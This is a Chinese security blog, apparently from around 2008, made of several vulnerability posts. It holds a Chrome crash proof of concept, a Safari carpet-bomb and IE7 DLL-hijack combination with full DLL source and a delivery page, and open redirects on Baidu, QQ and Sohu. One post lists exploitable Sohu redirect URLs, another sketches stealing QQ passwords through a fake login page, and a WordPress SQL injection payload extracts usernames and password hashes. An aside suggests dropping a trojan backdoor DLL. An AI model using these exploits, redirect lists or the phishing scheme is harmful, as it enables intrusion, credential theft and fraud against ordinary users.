Lin’s空间|Only

哎呀!谷歌浏览器崩溃了，现在重新启动？

影响版本：
Google Chrome Browser 0.2.149.27
谷歌浏览器 0.2.149.27

测试环境：
windows xp sp3
windows 2003 sp1

问题：

An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a ’special’ character, the chrome crashes with a Google Chrome message window “Whoa! Google Chrome has crashed. Restart now?”. It crashes on “int 3″ at 0×01002FF3 as an exception/trap, followed by “POP EBP” instruction when pointed out by the EIP register at 0×01002FF4.

描述地址：http://evilfingers.com/advisory/google_chrome_poc.php

演示代码：

<html>
<head></head>
<body>
demo <a href=”hello:%”>HERE</a>

<iframe src=”Free Coupwns!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.jar” frameborder=0 width=0 height=0></iframe>
</body>
</html>

关于Google chrome基于WebKit 525.13 (Safari 3.1)导致的Google Chrome vulnerable to carpet-bombing flaw 漏洞演示代码（一并看上边的演示代码），默认设置Google chrome是不提示自动下载回来的，只需要“中级用户选项”修改勾上“下载前询问每个文件的保存位置”，就可以躲过这个漏洞的侵害（PS：这样你就会收到提示保存位置，你就知道有个文件要下载来的，不然你不知不觉Google chrome就帮你下载啦）。

更多提示“哎呀!谷歌浏览器崩溃了，现在重新启动？”

今日一点, 漏洞 谷歌浏览器

Nitesh Dhanjani 发现的这个（windows版的safari浏览器在不经用户确认的情况下把文件下载到用户桌面）漏洞。标题为”Safari Carpet Bomb”的介绍可以在Nitesh Dhanjani博客看到，接着微软就发出一份（标题为：Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform）“安全公告”。Aviv Raff在他的博客发表“Safari pwns Internet Explorer”澄清这个（MS）漏洞早在2006年就已经报告过。

关于这个混合Safari和IE漏洞攻击的分析

这个IE老的漏洞Aviv Raff在他的两篇博客中已经做过比较详细的描述”Internet Explorer 7 – Still Spyware Writers Heaven“，和”IE7 DLL-load hijacking Code Execution Exploit PoC” 漏洞演示代码可以在”milw0rm”找到。

这个漏洞主要出在：ie（Windows Internet Explorer）优先从“用户桌面”加载动态链接库文件（dll），而不是从程序目录（一般是：C:\WINDOWS\SYSTEM32）。

windows版的safari浏览器在没有得到确认的情况下自动下载文件到用户桌面是这次引发windows用户遭受攻击的前因。当动态链接库文件（DLL文件）为特定的名称时打开ie将从这里（用户桌面）加载这些动态链接库文件。两件事情混合起来就是：IE加载运行safari自动下载到用户桌面的动态链接库文件，最终导致用户遭受恶意攻击。

作为演示下边为LIUDIEYU写的演示代码（ie加载后调用记事本打开一个不存在的文件）

另外Aviv Raff也写过个演示代码可以在”milw0rm”找到。

（PS：其实你可以写个木马后门dll扔出去让他运行！！）

/*
        Copyright (C) 2006-2007 Aviv Raff
        http://aviv.raffon.net
        Greetz: hdm, L.M.H, str0ke, SkyLined

        Compile and upload to the victim's desktop as one of the following hidden DLL files:
        - sqmapi.dll
        - imageres.dll
        - schannel.dll

        Run IE7 and watch the nice calculators pop up.
        Filter fdwReason to execute only once.

        Tested on WinXP SP2 with fully patched IE7.
        For testing/educational purpose only!

*/

#include <windows.h>

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    TCHAR windir[_MAX_PATH];
    TCHAR cmd[ _MAX_PATH ];
    GetEnvironmentVariable("WINDIR",windir,_MAX_PATH );
    wsprintf(cmd,"%s\\system32\\calc.exe",windir);
    ZeroMemory(&si,sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(π,sizeof(pi));
    CreateProcess(NULL,cmd,NULL,NULL,FALSE,0,NULL,NULL,&si,π);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return TRUE;
}

// milw0rm.com [2006-12-14]

———-dll.c———-
#include <windows.h>

BOOL APIENTRY DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;

ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
ZeroMemory(π,sizeof(pi));

CreateProcess(NULL,”NOTEPAD \”=====(((((we are in)))))=====\”",NULL,NULL,FALSE,0,NULL,NULL,&si,π);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return TRUE;
}

你可以编译这个库文件并命名为”schannel.dll”，“sqmapi.dll”或“imageres.dll”就可以利用啦。

———-index.html———-
<html><head>
<title>Test safari downloads automatically</title>
</head><body>
只要使用Safari打开这个页面，同时schannel.dll将自动下载到用户桌面<br>
<iframe src=”schannel.dll” width=1 height=1></iframe><br>

打开ie，将会看到效果（ie远程调用记事本打开一个不存在的文件）

<i>这就是结果.</i><br>
<br>
这个测试只能使用一次<br>
</body></html>

PS:个人认为这个组合漏洞攻击应该算是小概率事件，比如使用safari的用户很少情况会切换到ie，还有如果恶意攻击者，把文件显眼的下到用户桌面（对于这么明显的可疑文件很容易被删除的，如果隐藏怎么办呢？！）。不论怎样这是个潜在的危险（如果下次不是Safari呢？）。

PS2：这是不是也提醒程序员同学们写代码时要考虑自己的库文件搜索路径问题了，当前目录最多的情况应该是桌面啦，当然这涉及到windows内核（..）的问题（加载动态链接库的时候搜索路径的顺序——当前目录，程序目录，系统目录，谁先谁后？）

相关地址：

http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html

http://www.microsoft.com/technet/security/advisory/953818.mspx

http://liudieyu0.blog124.fc2.com/blog-entry-1.html

http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html

http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx

http://aviv.raffon.net/2006/12/14/IE7DLLloadHijackingCodeExecutionExploitPoC.aspx

http://aviv.raffon.net/2006/11/01/InternetExplorer7StillSpywareWritersHeaven.aspx

http://milw0rm.org/exploits/2929

演示地址：http://liudieyu.com/iesafari200806.2885391780966027/

今日一点, 漏洞, 病毒学习 combined attack, 混合漏洞攻击, 漏洞

cb上的广告链接觉得好奇就移动鼠标看看，然后使用广告地址替换后边的广告网站地址为我的地址照样跳转成功

（ps:目前还没搞清是百度联盟的认证广告还是什么广告，总之不是百度的主题推广广告，偶看到的这个广告是图片形式的）

原始广告地址：http://spcode.baidu.com/spcode/spClick?tn=ugmbbc_sp&ctn=0&styleid=1470&tourl=http://wopti.e78.com/channel.php?c=ugmbbc_spBAIDU_ANDu=1010

修改后可以被利用的地址：http://spcode.baidu.com/spcode/spClick?tourl=http://clin003.com/

这个地址可以根据原始地址改造，我挑选啦不出错的地址（主要看你的地址对这个参数的反应！）

通过搜索引擎得知是百度联盟的广告地址

百度联盟认证地址：http://spcode.baidu.com/

百度联盟地址：http://union.baidu.com/

下边是截图：

今日一点, 漏洞 CSRF, 百度

直接进入体验中心的地址是http://exp.qq.com/若体验里边的测试内容，需先登录QQ才可以继续填写体验申请表，在登录的过程发现这个：
http://exp.qq.com/cgi-bin/present/tec_cgi_go_signin?redirect=
http://exp.qq.com/cgi-bin/present/tec_cgi_present_plan_info%3Fplan_id%3D90

地址，很好，后边的应该就是我直接申请体验情况下，而没有让我填写体验表却跳转到登录界面的地址啦，而这个地址会在我登录完QQ后跳转进入。

想想看我直接吧后边的地址换成我的主页地址如：http://exp.qq.com/cgi-bin/present/tec_cgi_go_signin?redirect=
http://clin003.com

这个地址是有效的，即使刷新也同样有效。

如图

如果后边我的主页地址更有欺骗性（很像QQ的？或者直接编码）些，我在制作个很像体验中心登录页面的页面？我会提示什么验证码错误之类的错误，然后是不是会有好多人重新登陆QQ号啊，然后他并没有发现这个已经不是开始的哪个页面啦，如果把这个QQ号带密码发回后让他转向到体验中心去填问卷不至于人家产生怀疑

今日一点, 漏洞 CSRF, 腾讯, 跨站, QQ, 漏洞

看看下边这个转向到哪里啦http://doc.go.sohu.com/200712/6e97cd2fea9a0f8ac95439405c4ca95a.php?url=http://clin003.com

以下为查到的包含漏洞的页面（仅仅通过搜索引擎的索引结果）

这些链接在sohu都是在flash文件广告中的，所以baidu是搜不出来的，因为google的蜘蛛已经可以读flash文件中的部分文本啦，使用这个关键字搜索google就可以：site:sohu.com [doc.go.sohu.com*url=]

显然在club中出现的是已经利用的链接，下面的flash和专题新闻中的才是sohu真正使用的链接形式。

百度中找 doc.go.sohu.com url你将发现已经有很多利用的“恶意链接”啦，百度一下，找到相关网页约905篇，用时0.001秒

google中找[doc.go.sohu.com*url=]，约有1,390项符合[doc.go.sohu.com*url=]的查询结果，以下是第1-10项 ，不过google中部分标有“该网站可能含有恶意软件，有可能会危害您的电脑。”。

漏洞的成因很可能就是设计广告跳转记录代码的工作人员为啦以后方便使用就这样写啦个“通用代码”而没想到被发现会造成多少信任搜狐的网民受伤！！

以下是通过搜索引擎得到的部分可以利用的链接（请学习为目的，不要拿去害人）

http://doc.go.sohu.com/200801/5cb05572fda7c20a914842413d61ae7d.php?url=

http://doc.go.sohu.com/200712/d82c5aba39716d4eb8152d976a2da482.php?url=

http://doc.go.sohu.com/200712/e49df42d95615e85312aa0d030a2e552.php?url=
http://doc.go.sohu.com/200710/91e2420557be06fc6b4db18e6c7e43b8.php?url=

http://doc.go.sohu.com/200709/fd89d3a23c26c83163939a489fac349b.php?url=

http://doc.go.sohu.com/200708/adf56d76ba663e3db61b83e84384a141.php?url=

http://doc.go.sohu.com/200707/9b5c09c5c3cb8d856393a150683a5d92.php?

url=

http://doc.go.sohu.com/200706/fa9cda8c2a8455dc7e69465a16d48565.php?url=

http://doc.go.sohu.com/200706/1a22b9706f5ee9794ee29582de28d8a7.php?url=
http://doc.go.sohu.com/200705/df7fe00bc4bdb3ab1891dd6be56aa73a.php?url=

http://doc.go.sohu.com/200704/92d82b0a5606d9025e44b161597c0180.php?url=

http://doc.go.sohu.com/200704/cb19f7e8aa1d533134eea9c1197c423b.php?url=

http://doc.go.sohu.com/200703/e463ac8934207e079c5500ebddf964e1.php?url=

http://doc.go.sohu.com/200702/4788bbdf19b48e08a119cea260a63aaf.php?url=

今日一点, 代码调试, 搜索引擎, 漏洞 CSRF, 跨站, flash, sohu, 搜狐, 搜索引擎, 漏洞

EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOİT
S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
# WordPress album PHOTO SQL Injection# AUTHOR : S@BUN## HOME 1 : http://www.milw0rm.com/author/1334#
建议修改admin用户权限并建立一个不用于发文章的管理员用户或者直接进数据库修改admin为其他名字

wordpress支持, 漏洞 admin, Photo, Remote SQL Injection, WordPress, 权限, 注入, 漏洞